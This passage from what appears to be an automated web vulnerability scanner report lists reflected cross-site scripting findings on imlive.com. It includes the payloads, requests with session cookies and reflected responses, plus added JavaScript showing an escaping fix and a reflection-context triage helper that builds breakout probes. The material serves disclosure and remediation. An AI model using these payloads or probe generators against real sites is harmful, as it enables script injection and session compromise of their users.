Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:34 GMT
Connection: close
Content-Length: 92559
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1">
...[SNIP]...

2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:15 GMT
Connection: close
Content-Length: 224539
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1">
...[SNIP]...

2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. In the response below the reflection sits inside the single-quoted string assigned to imgSrc in the inline analytics beacon script, where it is copied three times (once in the ul= field and twice in qs=); the single quote in the payload terminates the string literal, and -alert(1)- is then parsed as an arithmetic expression, so alert(1) runs as soon as the script is evaluated.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the echoed data is the request URL and query string, which the page copies into the beacon URL built in an inline script; if that value must be emitted, it should be written as a properly escaped JavaScript string literal (quotes, backslashes, angle brackets and line terminators escaped as \uXXXX sequences) rather than concatenated into source text.
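The following added example (ours, not the scanner's or the site's code) reproduces the shape of the var imgSrc='...' statement from the response below, runs it with a recording stand-in for alert() to show the payload executing, and then emits the same value as an escaped JavaScript string literal. The beacon URL is reduced to its ul= field, and the function names and the jsStringLiteral encoder are assumptions of the example.

```javascript
// Added example, not code from the scanner report or from the site under test.
// Reproduces the shape of the `var imgSrc='...'` sink from finding 2.120, shows the
// breakout executing, then emits the same value as an escaped JS string literal.
// The beacon URL is reduced to its ul= field; function names are this example's own.

const BEACON = 'http://analytic.imlive.com/w.gif?ul=';

// Vulnerable: the request URL is concatenated into a single-quoted JS string.
// A single quote in the URL ends the literal and the remainder becomes code.
function beaconScriptVulnerable(requestUrl) {
  return `try{var imgSrc='${BEACON}${requestUrl}';}catch(e){}`;
}

// Safe: JSON.stringify yields a valid JS string literal with quotes, backslashes
// and control characters escaped. On top of that we escape '<' and '>' so a value
// containing "</script>" cannot terminate the enclosing script block, and the
// U+2028/U+2029 line terminators, which JSON permits but older JS parsers treat
// as a line break inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function beaconScriptSafe(requestUrl) {
  return `try{var imgSrc=${jsStringLiteral(BEACON + requestUrl)};}catch(e){}`;
}

// Executes a generated script body with a recording stand-in for alert(), so we
// can observe both whether the payload ran and what imgSrc ended up holding.
// (`var imgSrc` inside the try block is hoisted, so it is visible afterwards.)
function runScript(body) {
  const alertCalls = [];
  const fn = new Function('alert', `${body}; return imgSrc;`);
  const imgSrc = fn((x) => { alertCalls.push(x); });
  return { alertCalls, imgSrc };
}

// Request URL from finding 2.120 (the payload is the parameter name).
const URL_2120 = "/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1";
```

With URL_2120, runScript(beaconScriptVulnerable(URL_2120)) records one call to alert with 1 and leaves imgSrc as NaN (the literal was split into 'string' - alert(1) - 'string'), whereas runScript(beaconScriptSafe(URL_2120)) records no call and returns the full beacon URL, payload included, as plain data. The escaping of '<' and '>' matters because the HTML parser ends a script block at the first </script it sees, regardless of JavaScript string boundaries.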

Request

GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:31 GMT
Connection: close
Content-Length: 224765
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:23 GMT
Connection: close
Content-Length: 171425
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1">
...[SNIP]...

2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:40 GMT
Connection: close
Content-Length: 171563
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /liveexperts.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. In the response below the value is the single-quoted src of the <img name='an'> tracking-pixel element, whose analytics URL carries the raw request query string in its ul= and qs= fields; the single quote in the payload terminates the attribute value.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
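When a scanner reports Firm rather than Certain confidence, the first manual step is to confirm exactly which syntactic context the marker landed in and which quote encloses it, because that determines the breakout. The following added triage helper (not part of this report) classifies a reflection as JavaScript string, HTML attribute or HTML text and reports the enclosing quote. The three sample bodies are trimmed from the response snippets of findings 2.119, 2.120 and 2.123 in this report; the classifier itself is a heuristic of this example (it ignores JavaScript comments and regex literals and matches lower-case script tags only) and its function names are assumptions.

```javascript
// Added triage helper, not part of the scanner report. Classifies where a
// reflected marker landed (JS string, HTML attribute, HTML text) and which quote
// encloses it. Sample bodies are trimmed from the response snippets of findings
// 2.119, 2.120 and 2.123; the classifier is a heuristic (no JS comment/regex
// handling, lower-case <script> only) and its function names are this example's own.

// Walks JS source from `from` up to `pos`, tracking string literals; returns the
// quote of the literal open at `pos`, or null when `pos` is outside any string.
function jsQuoteAt(src, from, pos) {
  let quote = null;
  for (let i = from; i < pos; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') i++;                  // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    }
  }
  return quote;
}

// Walks a start tag from `tagStart` up to `pos`, tracking attribute values;
// returns the quote of the value open at `pos`, or null (unquoted or not in a value).
function attributeQuoteAt(html, tagStart, pos) {
  let quote = null;
  let afterEquals = false;
  for (let i = tagStart; i < pos; i++) {
    const c = html[i];
    if (quote) {
      if (c === quote) quote = null;
    } else if (afterEquals) {
      if (/\s/.test(c)) continue;           // whitespace between '=' and the value
      if (c === '"' || c === "'") quote = c;
      afterEquals = false;
    } else if (c === '=') {
      afterEquals = true;
    }
  }
  return quote;
}

function classifyReflection(html, marker) {
  const pos = html.indexOf(marker);
  if (pos < 0) return { context: 'not-reflected', quote: null };

  // Inside a <script> block: the last <script before the marker is still open.
  const scriptOpen = html.lastIndexOf('<script', pos);
  const scriptClose = html.lastIndexOf('</script', pos);
  if (scriptOpen >= 0 && scriptOpen > scriptClose) {
    const codeStart = html.indexOf('>', scriptOpen) + 1;
    return { context: 'js', quote: jsQuoteAt(html, codeStart, pos) };
  }

  // Inside a start tag: the last '<' before the marker has no matching '>' yet.
  const tagOpen = html.lastIndexOf('<', pos);
  const tagClose = html.lastIndexOf('>', pos);
  if (tagOpen >= 0 && tagOpen > tagClose) {
    return { context: 'html-attribute', quote: attributeQuoteAt(html, tagOpen, pos) };
  }
  return { context: 'html-text', quote: null };
}

// The breakout shape a scanner would try next for each context, in the shapes
// this report uses: quote + "><a>" for attributes, quote + "-alert(1)-" + quote
// for JS strings.
function scannerStyleProbe({ context, quote }) {
  if (context === 'js') return quote ? `${quote}-alert(1)-${quote}` : 'alert(1)';
  if (context === 'html-attribute') return (quote || '') + '><a>';
  if (context === 'html-text') return '<a>';
  return null;
}

// Constructed samples, trimmed from the report's response snippets.
const SAMPLE_2119 = '<a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1">';
const SAMPLE_2120 =
  '<script type="text/javascript">try{var imgSrc=\'http://analytic.imlive.com/w.gif?c=121273' +
  "&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^" +
  "b7464'-alert(1)-'af09ad182b3=1';}catch(e){};</script>";
const SAMPLE_2123 =
  "<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com" +
  "&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'>";
```

Running classifyReflection on the three samples with the random prefix of each payload (f8242, b7464, 42604) yields a double-quoted attribute, a single-quoted JavaScript string and a single-quoted attribute respectively, matching the contexts the scanner reported. Note that the attribute walker deliberately ignores '=' characters that occur inside a quoted value, which is what keeps the ul= and qs= fields of the analytics URL from being mistaken for attribute assignments.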

Request

GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 19420
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'>
...[SNIP]...

2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /localcompanionship.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:12 GMT
Connection: close
Content-Length: 16579
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'>
...[SNIP]...

2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /minglesingles.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

